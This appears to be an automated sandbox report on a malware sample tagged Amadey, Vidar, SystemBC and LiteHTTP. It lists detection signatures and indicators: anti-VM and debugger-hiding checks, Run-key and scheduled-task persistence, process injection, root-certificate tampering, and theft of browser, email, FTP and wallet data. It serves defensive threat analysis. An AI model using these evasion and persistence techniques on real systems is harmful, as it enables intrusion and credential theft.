Analysis Overview
SHA256
ca7fd0769435cdce93bb15e776809875311762a1a332651b4d44b0cea8f875a9
Threat Level: Known bad
The file ca7fd0769435cdce93bb15e776809875311762a1a332651b4d44b0cea8f875a9 was found to be: Known bad.
Malicious Activity Summary
Amadey
SystemBC
Vidar family
Vidar
Litehttp family
LiteHTTP
Amadey family
Detect Vidar Stealer
Systembc family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Boot or Logon Autostart Execution: Active Setup
Blocklisted process makes network request
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Uses browser remote debugging
Identifies Wine through registry keys
Reads user/profile data of web browsers
Reads data files stored by FTP clients
Loads dropped DLL
Drops startup file
Checks computer location settings
Reads user/profile data of local email clients
.NET Reactor proctector
Unsecured Credentials: Credentials In Files
Executes dropped EXE
Checks BIOS information in registry
Accesses cryptocurrency files/wallets, possible credential harvesting
Enumerates connected drives
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Checks installed software on the system
Suspicious use of SetThreadContext
AutoIT Executable
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Windows directory
Program crash
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Unsigned PE
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Uses Task Scheduler COM API
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Scheduled Task/Job: Scheduled Task
Suspicious use of FindShellTrayWindow
Modifies system certificate store
Checks SCSI registry key(s)
Modifies Internet Explorer settings
Delays execution with timeout.exe
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
Checks processor information in registry
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-03-06 00:12
Signatures
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-03-06 00:12
Reported
2025-03-06 00:14
Platform
win7-20240903-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Amadey
Amadey family
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
LiteHTTP
Litehttp family
SystemBC
Systembc family
Vidar
Vidar family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempNFZG5LF0I4JGLVAB6GREVZMUFYAXMB1V.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\xadikea\lgcr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10108220101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10108250101\a51af075dd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10108170101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10108260101\d94fbc1156.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10108280101\807cae801b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10108290101\14fcfefcdd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempOR7NNTGFBEVDCUJ707HDKBDMMU1LU8KQ.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
.NET Reactor proctector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\xadikea\lgcr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10108170101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10108220101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10108250101\a51af075dd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10108260101\d94fbc1156.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10108280101\807cae801b.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10108280101\807cae801b.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10108290101\14fcfefcdd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10108290101\14fcfefcdd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempNFZG5LF0I4JGLVAB6GREVZMUFYAXMB1V.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\xadikea\lgcr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10108170101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempOR7NNTGFBEVDCUJ707HDKBDMMU1LU8KQ.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempOR7NNTGFBEVDCUJ707HDKBDMMU1LU8KQ.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempNFZG5LF0I4JGLVAB6GREVZMUFYAXMB1V.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10108220101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10108250101\a51af075dd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10108260101\d94fbc1156.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempOR7NNTGFBEVDCUJ707HDKBDMMU1LU8KQ.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempNFZG5LF0I4JGLVAB6GREVZMUFYAXMB1V.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10108170101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10108220101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10108260101\d94fbc1156.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10108280101\807cae801b.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\ProgramData\xadikea\lgcr.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10108250101\a51af075dd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10108290101\14fcfefcdd.exe | N/A |
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\172cf80232.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107440101\\172cf80232.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107450121\\am_no.cmd" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\1RTut7w2\\Anubis.exe\"" | C:\Users\Admin\AppData\Local\Temp\10108190101\ce4pMzk.exe | N/A |
Checks installed software on the system
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\TempOR7NNTGFBEVDCUJ707HDKBDMMU1LU8KQ.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\TempNFZG5LF0I4JGLVAB6GREVZMUFYAXMB1V.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| N/A | N/A | C:\ProgramData\xadikea\lgcr.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10108170101\v6Oqdnc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10108220101\FvbuInU.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10108250101\a51af075dd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10108260101\d94fbc1156.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10108280101\807cae801b.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10108290101\14fcfefcdd.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2120 set thread context of 2316 | N/A | C:\Users\Admin\AppData\Local\Temp\10108180101\MCxU5Fj.exe | C:\Users\Admin\AppData\Local\Temp\10108180101\MCxU5Fj.exe |
| PID 2068 set thread context of 2828 | N/A | C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe | C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe |
| PID 2148 set thread context of 1744 | N/A | C:\Users\Admin\AppData\Local\Temp\10108270101\019b07ca14.exe | C:\Users\Admin\AppData\Local\Temp\10108270101\019b07ca14.exe |
| PID 2252 set thread context of 3060 | N/A | C:\Users\Admin\AppData\Local\Temp\10108260101\d94fbc1156.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 2500 set thread context of 2976 | N/A | C:\Users\Admin\AppData\Local\Temp\10108280101\807cae801b.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\TempOR7NNTGFBEVDCUJ707HDKBDMMU1LU8KQ.EXE | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108220101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108250101\a51af075dd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108260101\d94fbc1156.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108280101\807cae801b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108270101\019b07ca14.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108290101\14fcfefcdd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\ca7fd0769435cdce93bb15e776809875311762a1a332651b4d44b0cea8f875a9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108150101\zY9sqWs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108180101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108230101\Ps7WqSx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108270101\019b07ca14.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107440101\172cf80232.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108170101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\TempOR7NNTGFBEVDCUJ707HDKBDMMU1LU8KQ.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\xadikea\lgcr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108180101\MCxU5Fj.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\10108220101\FvbuInU.exe | N/A |
